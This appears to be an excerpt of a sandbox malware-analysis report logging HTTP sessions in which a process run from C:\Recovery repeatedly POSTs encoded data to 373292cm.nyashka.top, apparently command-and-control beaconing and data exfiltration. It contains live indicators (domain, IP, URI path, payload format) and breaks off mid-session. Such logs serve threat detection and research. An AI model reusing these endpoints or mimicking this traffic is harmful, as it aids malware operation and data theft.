                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.6 | 49728 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:37.926336050 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.6 | 49730 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:38.082374096 CEST | 295 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 151756
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:38.744330883 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:39.500750065 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    8 | 192.168.2.6 | 49731 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:38.103984118 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:38.451109886 CEST2512OUTData Raw: 5f 51 59 57 54 45 54 5e 5b 5f 5a 51 59 57 58 53 57 5e 5d 5e 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _QYWTET^[_ZQYWXSW^]^W_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\;$68Y" Y)=(^>-)\<-?4 2;<947 ",>&F$.Y/5
                                    Aug 25, 2024 15:43:38.829404116 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:38.966350079 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    9 | 192.168.2.6 | 49732 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:39.292814970 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:39.644577026 CEST2516OUTData Raw: 5f 53 5c 51 51 42 54 5d 5b 5f 5a 51 59 5f 58 57 57 5d 5d 59 57 5a 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\QQBT][_ZQY_XWW]]YWZSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.8'"7"0:+.<_<)?>? ??R#8V+3_42,.&F$.Y/
                                    Aug 25, 2024 15:43:39.772814035 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:39.934329987 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    10 | 192.168.2.6 | 49733 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:40.066864014 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:40.424029112 CEST2516OUTData Raw: 5a 50 5c 52 54 48 54 5b 5b 5f 5a 51 59 55 58 55 57 5a 5d 5d 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZP\RTHT[[_ZQYUXUWZ]]W]S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,3!; 9\)=#>-5[?4Z7S4(_7\7#=X,&F$.Y/-
                                    Aug 25, 2024 15:43:40.737401009 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:40.867577076 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    11 | 192.168.2.6 | 49734 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:41.003880978 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:41.357326984 CEST2516OUTData Raw: 5a 55 59 52 51 40 51 5d 5b 5f 5a 51 59 54 58 5f 57 5b 5d 5a 57 50 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZUYRQ@Q][_ZQYTX_W[]ZWPSU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._8,5<_# Y=[ \<>)+>$7<(#10?*##3!];.&F$.Y/)
                                    Aug 25, 2024 15:43:41.674597979 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:41.801875114 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    12 | 192.168.2.6 | 49735 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:42.292937994 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:42.638895035 CEST2516OUTData Raw: 5a 51 5c 54 54 44 51 59 5b 5f 5a 51 59 54 58 50 57 5d 5d 58 57 58 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\TTDQY[_ZQYTXPW]]XWXSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y,U$"=(\41X>-$\?X&?'7/R ",(#_#1;.&F$.Y/)
                                    Aug 25, 2024 15:43:43.193212986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:43.194067955 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    13 | 192.168.2.6 | 49736 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:43.194902897 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1828
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:43.547055960 CEST1828OUTData Raw: 5f 5c 59 55 51 47 51 5e 5b 5f 5a 51 59 57 58 56 57 59 5d 5d 57 5f 53 55 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YUQGQ^[_ZQYWXVWY]]W_SU\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.8+6$_70!=++._<-'[#,70P?7]4058&F$.Y/!
                                    Aug 25, 2024 15:43:44.014338017 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:44.072012901 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 29 35 26 59 25 28 38 50 30 23 21 0c 2a 2d 09 5b 2b 2d 04 06 25 38 25 59 32 07 38 57 30 3b 36 02 3f 10 29 08 31 01 24 01 2d 34 2b 5d 0c 13 22 14 34 3a 21 04 26 2c 2b 04 3d 16 37 5c 21 2f 25 00 29 3a 29 54 2b 3f 02 5a 28 07 05 10 3f 39 22 54 2c 28 0f 5c 3a 0e 25 08 20 2e 2b 52 0d 11 24 52 2b 3d 03 55 29 3e 38 06 22 3b 3f 12 26 2e 2e 56 26 1c 29 0f 24 29 01 05 27 21 39 50 25 22 35 1c 24 3b 36 5a 27 3f 36 09 22 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W)5&Y%(8P0#!*-[+-%8%Y28W0;6?)1$-4+]"4:!&,+=7\!/%):)T+?Z(?9"T,(\:% .+R$R+=U)>8";?&..V&)$)'!9P%"5$;6Z'?6"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    14 | 192.168.2.6 | 49737 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:43.239518881 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:43.610989094 CEST2516OUTData Raw: 5f 55 59 57 54 44 54 58 5b 5f 5a 51 59 56 58 54 57 5d 5d 52 57 5e 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _UYWTDTX[_ZQYVXTW]]RW^S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8<#-;# 5\)'>.9_([ ,<4!P**$ 5_,&F$.Y/!
                                    Aug 25, 2024 15:43:44.014584064 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:44.106225967 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    15 | 192.168.2.6 | 49738 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:44.238580942 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:44.742530107 CEST2516OUTData Raw: 5f 5c 5c 54 54 40 54 5a 5b 5f 5a 51 59 50 58 56 57 51 5d 52 57 58 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\\TT@TZ[_ZQYPXVWQ]RWXS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./38!.4Y #%]+-#+)+#4?#'(:?\#6..&F$.Y/
                                    Aug 25, 2024 15:43:44.912566900 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:45.042135954 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    16 | 192.168.2.6 | 49739 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:45.178832054 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:45.529180050 CEST | 2516 | OUT | Data Raw: 5a 55 5c 57 54 46 51 5a 5b 5f 5a 51 59 51 58 57 57 50 5d 53 57 5c 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZU\WTFQZ[_ZQYQXWWP]SW\S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y8/A#=8X V"><=!_+>8#Z?P#V<7,&F$.Y/=
                                    Aug 25, 2024 15:43:45.844005108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:45.973835945 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    17 | 192.168.2.6 | 49740 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:46.096366882 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:46.451878071 CEST | 2516 | OUT | Data Raw: 5f 54 5c 50 51 45 54 5c 5b 5f 5a 51 59 5f 58 51 57 5e 5d 53 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _T\PQET\[_ZQY_XQW^]SW\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V./#-8#0X*=+<=4 $!2<<<7/>&F$.Y/
                                    Aug 25, 2024 15:43:46.802618027 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:47.001422882 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    18 | 192.168.2.6 | 49742 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:47.160403013 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:47.514535904 CEST | 2516 | OUT | Data Raw: 5a 57 59 54 51 47 54 5e 5b 5f 5a 51 59 50 58 51 57 50 5d 5a 57 50 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYTQGT^[_ZQYPXQWP]ZWPS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.],+C#=$^ Z*=\+.\+>;4Z3V!1$P+:?^4V*;.&F$.Y/
                                    Aug 25, 2024 15:43:47.833786964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:47.958163023 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    19 | 192.168.2.6 | 49743 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:48.106570959 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:48.451092958 CEST | 2516 | OUT | Data Raw: 5f 51 5c 54 51 40 51 5b 5b 5f 5a 51 59 5f 58 57 57 51 5d 5a 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\TQ@Q[[_ZQY_XWWQ]ZW_S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/'B5 ]>=(5Z?>$##Q7R**;\ V&/>&F$.Y/
                                    Aug 25, 2024 15:43:48.775976896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:48.906919956 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    20 | 192.168.2.6 | 49744 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:49.031591892 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    21 | 192.168.2.6 | 49745 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:49.247071981 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:49.592120886 CEST | 1840 | OUT | Data Raw: 5f 54 5c 52 51 47 54 5d 5b 5f 5a 51 59 5e 58 56 57 50 5d 5b 57 51 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
